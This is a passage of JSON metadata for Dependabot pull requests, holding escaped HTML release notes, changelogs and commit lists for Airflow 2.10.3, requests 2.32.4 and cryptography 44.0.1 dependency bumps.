(\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42272\"\u003e#42272\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBackport: Bump Flask-AppBuilder to \u003ccode\u003e4.5.2\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43309\"\u003e#43309\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43318\"\u003e#43318\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCheck python version that was used to install pre-commit venvs (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43282\"\u003e#43282\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43310\"\u003e#43310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eResolve warning in Dataset Alias migration (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43425\"\u003e#43425\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apache/airflow/blob/2.10.3/RELEASE_NOTES.rst\"\u003eapache-airflow's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eAirflow 2.10.3 (2024-11-04)\u003c/h2\u003e\n\u003cp\u003eSignificant Changes\n^^^^^^^^^^^^^^^^^^^\u003c/p\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003cp\u003eBug Fixes\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eImproves the handling of value masking when setting Airflow variables for enhanced security.  (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43123\"\u003e#43123\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43278\"\u003e#43278\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds support for task_instance_mutation_hook to handle mapped operators with index 0. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42661\"\u003e#42661\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43089\"\u003e#43089\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes executor cleanup to properly handle zombie tasks when task instances are terminated. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43065\"\u003e#43065\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds retry logic for HTTP 502 and 504 errors in internal API calls to handle webserver startup issues. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42994\"\u003e#42994\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43044\"\u003e#43044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRestores the use of separate sessions for writing and deleting RTIF data to prevent StaleDataError. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42928\"\u003e#42928\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43012\"\u003e#43012\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes PythonOperator error by replacing hyphens with underscores in DAG names. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42993\"\u003e#42993\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproving validation of task retries to handle None values (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42532\"\u003e#42532\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42915\"\u003e#42915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes error handling in dataset managers when resolving dataset aliases into new datasets (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42733\"\u003e#42733\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnables clicking on task names in the DAG Graph View to correctly select the corresponding task. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/38782\"\u003e#38782\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42697\"\u003e#42697\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent redirect loop on /home with tags/last run filters (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42607\"\u003e#42607\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42609\"\u003e#42609\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42628\"\u003e#42628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSupport of host.name in OTEL metrics and usage of OTEL_RESOURCE_ATTRIBUTES in metrics (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42428\"\u003e#42428\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42604\"\u003e#42604\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReduce eyestrain in dark mode with reduced contrast and saturation (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42567\"\u003e#42567\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42583\"\u003e#42583\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHandle ENTER key correctly in trigger form and allow manual JSON (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42525\"\u003e#42525\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42535\"\u003e#42535\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure DAG trigger form submits with updated parameters upon keyboard submit (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42487\"\u003e#42487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42499\"\u003e#42499\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDo not attempt to provide not \u003ccode\u003estringified\u003c/code\u003e objects to UI via xcom if pickling is active (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42388\"\u003e#42388\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42486\"\u003e#42486\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix the span link of task instance to point to the correct span in the scheduler_job_loop (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42430\"\u003e#42430\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42480\"\u003e#42480\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBugfix task execution from runner in Windows (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42426\"\u003e#42426\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42478\"\u003e#42478\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAllows overriding the hardcoded OTEL_SERVICE_NAME with an environment variable (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42242\"\u003e#42242\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42441\"\u003e#42441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproves trigger performance by using \u003ccode\u003eselectinload\u003c/code\u003e instead of \u003ccode\u003ejoinedload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/40487\"\u003e#40487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42351\"\u003e#42351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSuppress warnings when masking sensitive configs (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43335\"\u003e#43335\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43337\"\u003e#43337\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMasking configuration values irrelevant to DAG author (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43040\"\u003e#43040\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43336\"\u003e#43336\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eExecute templated bash script as file in BashOperator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43191\"\u003e#43191\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes schedule_downstream_tasks to include upstream tasks for one_success trigger rule (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42582\"\u003e#42582\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43299\"\u003e#43299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd retry logic in the scheduler for updating trigger timeouts in case of deadlocks. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/41429\"\u003e#41429\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42651\"\u003e#42651\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMark all tasks as skipped when failing a dag_run manually (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43572\"\u003e#43572\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eTrySelector\u003c/code\u003e for Mapped Tasks in Logs and Details Grid Panel (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43566\"\u003e#43566\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConditionally add OTEL events when processing executor events (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43558\"\u003e#43558\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43567\"\u003e#43567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix broken stat \u003ccode\u003escheduler_loop_duration\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42886\"\u003e#42886\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43544\"\u003e#43544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure total_entries in /api/v1/dags (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43377\"\u003e#43377\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43429\"\u003e#43429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eInclude limit and offset in request body schema for List task instances (batch) endpoint (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43479\"\u003e#43479\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDon't raise a warning in ExecutorSafeguard when execute is called from an extended operator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42849\"\u003e#42849\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43577\"\u003e#43577\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eMiscellaneous\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate session auth backend (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42911\"\u003e#42911\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved unicodecsv dependency for providers with Airflow version 2.8.0 and above (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42765\"\u003e#42765\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42970\"\u003e#42970\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove the referrer from Webserver to Scarf (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42901\"\u003e#42901\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42942\"\u003e#42942\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBump \u003ccode\u003edompurify\u003c/code\u003e from 2.2.9 to 2.5.6 in /airflow/www (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42263\"\u003e#42263\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42270\"\u003e#42270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCorrect docstring format in _get_template_context (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42244\"\u003e#42244\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42272\"\u003e#42272\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBackport: Bump Flask-AppBuilder to \u003ccode\u003e4.5.2\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43309\"\u003e#43309\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43318\"\u003e#43318\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/c99887ec11ce3e1a43f2794fcf36d27555140f00\"\u003e\u003ccode\u003ec99887e\u003c/code\u003e\u003c/a\u003e Update RELEASE_NOTES.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/1c7fba76ec613517632931d5a268029ad24b33cb\"\u003e\u003ccode\u003e1c7fba7\u003c/code\u003e\u003c/a\u003e mark test_task_workflow_trigger_success as flaky (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42972\"\u003e#42972\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43580\"\u003e#43580\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/08bbf89225b9b87521044fa04a9666690792a4cb\"\u003e\u003ccode\u003e08bbf89\u003c/code\u003e\u003c/a\u003e FIX: Don't raise a warning in ExecutorSafeguard when execute is called from a...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/7e86bf85d3bd6fda387f0a5b189f382c0673f611\"\u003e\u003ccode\u003e7e86bf8\u003c/code\u003e\u003c/a\u003e Mark all tasks as skipped when failing a dag_run manually including t… (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43572\"\u003e#43572\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/8e79c7a27f1fdb465afdd1d4de0de7d607a27357\"\u003e\u003ccode\u003e8e79c7a\u003c/code\u003e\u003c/a\u003e Fix TrySelector for Mapped Tasks in Logs and Details Grid Panel (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43566\"\u003e#43566\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/c12e6284c1a769da58903f076b93a32b185b12f1\"\u003e\u003ccode\u003ec12e628\u003c/code\u003e\u003c/a\u003e Conditionally add OTEL events when processing executor events (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43558\"\u003e#43558\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43567\"\u003e#43567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/898f332773772fea5ae76182c5393f14d212ddf8\"\u003e\u003ccode\u003e898f332\u003c/code\u003e\u003c/a\u003e Fix broken stat scheduler_loop_duration (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42886\"\u003e#42886\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43544\"\u003e#43544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/7aea4b56d76e80ee65613b851b5a9898df56d79a\"\u003e\u003ccode\u003e7aea4b5\u003c/code\u003e\u003c/a\u003e Ensure total_entries in /api/v1/dags (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43377\"\u003e#43377\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43429\"\u003e#43429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/9c044ea2a25240f7cc28b6e20337c2c4dc6e1e78\"\u003e\u003ccode\u003e9c044ea\u003c/code\u003e\u003c/a\u003e include limit and offset in request body schema for List task instances (batc...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/dd296c5338150cebe24c1edb46ba5a944f82a5eb\"\u003e\u003ccode\u003edd296c5\u003c/code\u003e\u003c/a\u003e This PR resolves an SQLAlchemy warning in the migration by correctly setting ...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/apache/airflow/compare/2.6.3...2.10.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.31.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.0\u003c/h2\u003e\n\u003cp\u003e2.32.0 (2024-05-20)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.0 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd6...\n\n_Description has been truncated_","html_url":"https://github.com/Reality2byte/python-docs-samples/pull/28","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Reality2byte%2Fpython-docs-samples/issues/28","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/28/packages"}},{"old_version":"1.10.0","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-06-10T08:23:14.000Z","version_change":"1.10.0 → 1.11.0","issue":{"uuid":"2580482452","node_id":"PR_kwDOHEePGc6ZzwmU","number":1592,"state":"open","title":"build(deps): bump the pip group across 1 directory with 3 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-06-10T08:23:14.000Z","updated_at":"2025-07-10T20:33:57.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"pip","update_count":3,"packages":[{"name":"cryptography","old_version":"43.0.1","new_version":"44.0.1","repository_url":"https://github.com/pyca/cryptography"},{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.32.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 3 updates in the /binary-option/client directory: [cryptography](https://github.com/pyca/cryptography), [py](https://github.com/pytest-dev/py) and [requests](https://github.com/psf/requests).\n\nUpdates `cryptography` from 43.0.1 to 44.0.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst\"\u003ecryptography's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e44.0.1 - 2025-02-11\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Updated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.1.\n* We now build ``armv7l`` ``manylinux`` wheels and publish them to PyPI.\n* We now build ``manylinux_2_34`` wheels and publish them to PyPI.\n\u003cp\u003e.. _v44-0-0:\u003c/p\u003e\n\u003cp\u003e44.0.0 - 2024-11-27\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBACKWARDS INCOMPATIBLE:\u003c/strong\u003e Dropped support for LibreSSL \u0026lt; 3.9.\u003c/li\u003e\n\u003cli\u003eDeprecated Python 3.7 support. Python 3.7 is no longer supported by the\nPython core team. Support for Python 3.7 will be removed in a future\n\u003ccode\u003ecryptography\u003c/code\u003e release.\u003c/li\u003e\n\u003cli\u003eUpdated Windows, macOS, and Linux wheels to be compiled with 